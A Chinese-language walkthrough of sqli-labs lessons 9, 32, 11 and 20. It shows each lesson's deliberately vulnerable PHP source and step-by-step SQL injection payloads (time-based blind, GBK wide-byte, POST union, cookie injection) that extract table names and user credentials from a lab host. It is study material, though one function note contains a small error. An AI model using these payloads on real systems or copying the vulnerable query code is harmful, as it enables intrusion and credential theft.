SQL注入(下)
前言
个人观点,若有误请指教
Less-9
源码
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-9 Blind- Time based- Single Quotes- String</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
}
}
else {
echo "Please input the ID as parameter with numeric value";}
?>
</font> </div></br></br></br><center>
<img src="../images/Less-9.jpg" /></center>
</body>
</html>
实操
- 获得数据库长度
sql.test/less-9/?id= 1’ and if((length(database()))=8, 1, sleep(5)) --+
注解:当长度正确时,页面很快就加载出来了,否则将休眠5秒(很慢)。if函数的用法
- 获得数据库名称
sql.test/less-9/?id= 1’ and if((ascii(substr(database(),1,1)))=115, 1, sleep(5)) --+
注解:这里可以使用BurpSuite工具破解
- 获得数据表的数量
sql.test/less-9/?id= 1’ and if((select count(table_name) from information_schema.tables where table_schema=database()) =4, 1, sleep(5)) --+
- 获得数据表名长度
sql.test/less-9/?id= 1’ and if((select length(table_name) from information_schema.tables where table_schema=database() limit 0, 1) =6, 1, sleep(5)) --+
注解:以上是只获得第一个表名长度,如果要获得其他表名长度,修改limit后面的数字即可
- 获得数据表名称
sql.test/less-9/?id= 1’ and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0, 1),1,1)))=101, 1, sleep(5)) --+
注解:这里可以使用BurpSuite工具破解,获得database()数据库中的第一个表名。
- 获得数据表的字段总数
sql.test/less-9/?id= 1’ and if((select count(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=‘users’ and TABLE_SCHEMA=‘security’) = 3, 1, sleep(5)) --+
注解:获得user表的字段总数
- 获得数据表的字段长度
sql.test/less-9/?id= 1’ and if((select length(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=‘users’ and TABLE_SCHEMA=‘security’ limit 0,1) = 2 , 1, sleep(5)) --+
注解:获得user表第一个字段的长度。
- 获得表的字段名字
sql.test/less-9/?id= 1’ and if((ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=‘users’ and TABLE_SCHEMA=‘security’ limit 0,1), 1, 1))) = 105 , 1, sleep(5)) --+
注解:这里可以使用BurpSuite工具破解,获得user表第一个字段的名字(根据其长度)。
- 获得字段数据内容长度
sql.test/less-9/?id= 1’ and if( (select length(username) from users limit 0,1) = 4 , 1, sleep(5)) --+
注解:获得users表username字段的第一条内容长度。
- 获得字段数据内容
sql.test/less-9/?id= 1’ and if((ascii(substr((select username from users limit 0,1), 1, 1))) = 68, 1, sleep(5)) --+
注解:这里可以使用BurpSuite工具破解,获得users表username字段的第一条内容(根据其长度)。
- 个人总结:
- 该注入为盲注中的时间注入,该注入的回响都一样(查询内容为空或者查询语句有错误或者查询内容有值),所以只能通过回响的时间来判断。
Less-32
源码
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-32 **Bypass addslashes()**</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="5" color="#00FF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
function check_addslashes($string)
{
$string = preg_replace('/'.preg_quote('\\').'/', "\\\\\\", $string); //escape any backslash
$string = preg_replace('/\'/i', '\\\'', $string); //escape single quote with a backslash
$string = preg_replace('/\"/', "\\\"", $string); //escape double quote with a backslash
return $string;
}
// take the variables
if(isset($_GET['id']))
{
$id=check_addslashes($_GET['id']);
//echo "The filtered request is :" .$id . "<br>";
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
echo $sql;
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font color= "#00FF00">';
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
}
else {
echo "Please input the ID as parameter with numeric value";}
?>
</font> </div></br></br></br><center>
<img src="../images/Less-32.jpg" />
</br>
</br>
</br>
</br>
</br>
<font size='4' color= "#33FFFF">
<?php
function strToHex($string)
{
$hex='';
for ($i=0; $i < strlen($string); $i++)
{
$hex .= dechex(ord($string[$i]));
}
return $hex;
}
echo "Hint: The Query String you input is escaped as : ".$id ."<br>";
echo "The Query String you input in Hex becomes : ".strToHex($id). "<br>";
?>
</center>
</font>
</body>
</html>
实操
- 是否存在宽字节注入
http://sql.test/Less-32/?id=%df’
注解:在调用sql前,%df’ ⇒ %df/’ ==>汉字’,这样导致’提前闭合,而后面的’又没有被注释掉,这里报错证明存在宽字节注入。
- 获得当前数据库名称
http://sql.test/Less-32/?id=%df’ union select 1, 2, database() %23
- 获得数据库的表数
http://sql.test/Less-32/?id=%df’ union select 1, 2, (select count(table_name) from information_schema.tables where table_schema=database())%23
- 获得表名
http://sql.test/Less-32/?id=%df’ union select 1, 2, (select table_name from information_schema.tables where table_schema=database() limit 3, 1)%23
- 获得数据表的字段数
http://sql.test/Less-32/?id=%df’ union select 1, 2, (select count(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=((select table_name from information_schema.tables where table_schema=database() limit 3, 1)) and TABLE_SCHEMA=database()) %23
- 获得数据表的字段名
http://sql.test/Less-32/?id=%df’ union select 1, 2, (select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=(select table_name from information_schema.tables where table_schema=database() limit 3, 1) and TABLE_SCHEMA=database() limit 0,1) %23
- 获得数据内容
http://sql.test/Less-32/?id=%df’ union select id, username, password from users limit 0, 1 %23
注意:每次只能查找三个字段,如有多于三的字段应该分多次查找。
- 个人总结:
- 该注入为宽字节注入,其使用的条件是数据库必须使用gbk编码(2个字节为一个汉字的特性),而该php源码把输入的’转义成\'再调用sql语句,导致’提前被闭合。utf-8(3个字节为一个汉字的特性)。
Less-11
源码
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-11- Error Based- String</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div>
<div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
<div style="padding-top:10px; font-size:15px;">
<!--Form to post the data for sql injections Error based SQL Injection-->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">Username :
<input type="text" name="uname" value=""/>
</div>
<div> Password :
<input type="text" name="passwd" value=""/>
</div></br>
<div style=" margin-top:9px;margin-left:90px;">
<input type="submit" name="submit" value="Submit" />
</div>
</form>
</div></div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="6" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname);
fwrite($fp,'Password:'.$passwd."\n");
fclose($fp);
// connectivity
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
echo $sql;
echo "<br/>";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in\n\n " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
?>
</font>
</div>
</body>
</html>
实操
-
是否存在注入点
www’ or 1 = 1 #
注解:有回响(Your Login name:Dumb;Your Password:Dumb),证明存在post注入。
-
获得回响点
www’ union select 1, 2 #
-
获得当前数据库名
www’ union select 1, database() #
-
获得数据库的表数
www’ union select 1, (select count(table_name) from information_schema.tables where table_schema=database()) #
-
获得数据表名
www’ union select 1,(select table_name from information_schema.tables where table_schema=database() limit 3, 1) #
-
获得查询user表语句结果集的字段数
www’ or 1 = 1 order by 2 #
-获得表的字段数
www’ union select 1, (select count(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=“users” and TABLE_SCHEMA=database()) # -
获得表的字段名
www’ union select 1,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=“users” and TABLE_SCHEMA=database() limit 0,1) #
-
获得表的数据
www’ union select username,password from users limit 1,1 #
注解:每次只能查询一条记录中的两个字段。 -
个人总结:
- 在输入时–(注释)前后都要有一个空格,而#(注释)前面需要一个空格(后面没有特别要求)。
- 注意在输入框中%23不代表注释。
Less-20
源码
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-20 Cookie Injection- Error Based- string</title>
</head>
<body bgcolor="#000000">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
//没有cookie,首次登陆时
if(!isset($_COOKIE['uname']))
{
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
echo "<div style=' margin-top:20px;color:#FFF; font-size:24px; text-align:center'> Welcome <font color='#FF0000'> Dhakkan </font><br></div>";
echo "<div align='center' style='margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;'>";
echo "<div style='padding-top:10px; font-size:15px;'>";
echo "<!--Form to post the contents -->";
echo '<form action=" " name="form1" method="post">';
echo ' <div style="margin-top:15px; height:30px;">Username : ';
echo ' <input type="text" name="uname" value=""/> </div>';
echo ' <div> Password : ';
echo ' <input type="text" name="passwd" value=""/></div></br>';
echo ' <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>';
echo '</form>';
echo '</div>';
echo '</div>';
echo '<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">';
echo '<font size="3" color="#FFFF00">';
echo '<center><br><br><br>';
echo '<img src="../images/Less-20.jpg" />';
echo '</center>';
function check_input($value)
{
if(!empty($value))
{
$value = substr($value,0,20); // truncation (see comments)
}
if (get_magic_quotes_gpc()) // Stripslashes if magic quotes enabled
{
$value = stripslashes($value);
}
if (!ctype_digit($value)) // Quote if not a number
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
echo "<br>";
echo "<br>";
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
$cookee = $row1['username'];
if($row1)
{
echo '<font color= "#FFFF00" font size = 3 >';
setcookie('uname', $cookee, time()+3600);
header ('Location: index.php');
echo "I LOVE YOU COOKIES";
echo "</font>";
echo '<font color= "#0000ff" font size = 3 >';
//echo 'Your Cookie is: ' .$cookee;
echo "</font>";
echo "<br>";
print_r(mysql_error());
echo "<br><br>";
echo '<img src="../images/flag.jpg" />';
echo "<br>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
echo "</font>";
echo '</font>';
echo '</div>';
}
//有cookie
else
{
//打印相关信息
if(!isset($_POST['submit']))
{
$cookee = $_COOKIE['uname'];
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600;
echo "<center>";
echo '<br><br><br>';
echo '<img src="../images/Less-20.jpg" />';
echo "<br><br><b>";
echo '<br><font color= "red" font size="4">';
echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
echo "</font><br>";
echo '<font color= "cyan" font size="4">';
echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];
echo "</font><br>";
echo '<font color= "#FFFF00" font size = 4 >';
echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
echo '<font color= "orange" font size = 5 >';
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
echo "<br></font>";
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
$result=mysql_query($sql);
if (!$result)
{
die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if($row)
{
echo '<font color= "pink" font size="5">';
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo '<font color= "grey" font size="5">';
echo 'Your Password:' .$row['password'];
echo "</font></b>";
echo "<br>";
echo 'Your ID:' .$row['id'];
}
else
{
echo "<center>";
echo '<br><br><br>';
echo '<img src="../images/slap1.jpg" />';
echo "<br><br><b>";
//echo '<img src="../images/Less-20.jpg" />';
}
echo '<center>';
echo '<form action="" method="post">';
echo '<input type="submit" name="submit" value="Delete Your Cookie!" />';
echo '</form>';
echo '</center>';
}
//删除cookie
else
{
echo '<center>';
echo "<br>";
echo "<br>";
echo "<br>";
echo "<br>";
echo "<br>";
echo "<br>";
echo '<font color= "#FFFF00" font size = 6 >';
echo " Your Cookie is deleted";
setcookie('uname', $row1['username'], time()-3600);
header ('Location: index.php');
echo '</font></center></br>';
}
echo "<br>";
echo "<br>";
//header ('Location: main.php');
echo "<br>";
echo "<br>";
//echo '<img src="../images/slap.jpg" /></center>';
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'Cookie:'.$cookee."\n");
fclose($fp);
}
?>
</body>
</html>
注意:header只会转发http报文头,即用户名密码之类的都会不复存在。
实操
由于该源码对输入的账号和密码进行了截断(20个字符)以及转义,不容易进行注入;
但对于产生的cookie并没有进行其他的过滤操作,所以可以通过Burp进行代理,篡改中间的报文(第二次的请求报文)。扩充了解:Burp suite之拦截响应报文
-
获得后台查询语句的结果集字段数
注解:没有报错,证明字段数为3 -
获得回响点
’ union select 1,2,3
注解:可以不用加(limit 0, 1),因为查询结果只有一条记录,而mysql_fetch_array函数每次只取一条 -
获得当前数据库名
-
获得当前数据库的表数
-
获得数据库表名
-
获得表的字段数
-
获得字段名
-
获得数据
个人总结:
-该注入为cookie注入,目前来说,只有知道其中一个正确的账号和密码才能进行注入,以至于获得全部的信息(只根据上面的源码来讲)。
URL中特殊字符转义编码
字符 | URL编码值 |
---|---|
空格 | %20 |
" | %22 |
# | %23 |
% | %25 |
& | %26 |
( | %28 |
) | %29 |
+ | %2B |
, | %2C |
/ | %2F |
: | %3A |
; | %3B |
< | %3C |
= | %3D |
> | %3E |
? | %3F |
@ | %40 |
\ | %5C |
| | %7C |
MySQL函数
①group_concat()一般搭配group by使用(具体上网查),但如果没有group by,则直接将那一个字段所有的值合拼(以,分隔);
②user()返回MySQL连接的当前用户名和主机名;
③information_schema数据库,是mysql安装之后自带的数据库,其里面保存着所有数据库,而其table表保存所有数据库的表名。
④Lenghth() 返回字符串的长度
⑤Ascii() 返回字符串的AScii码
⑥Substr(x,num1,num2),从num1开始截取字符串x,截取数量为num2
⑦sleep(x) 将程序执行延迟x秒
⑧if(exp1, xep2, xep3) 如果第一个语句/条件正确,他就执行xep2代码,否则就执行xep2代码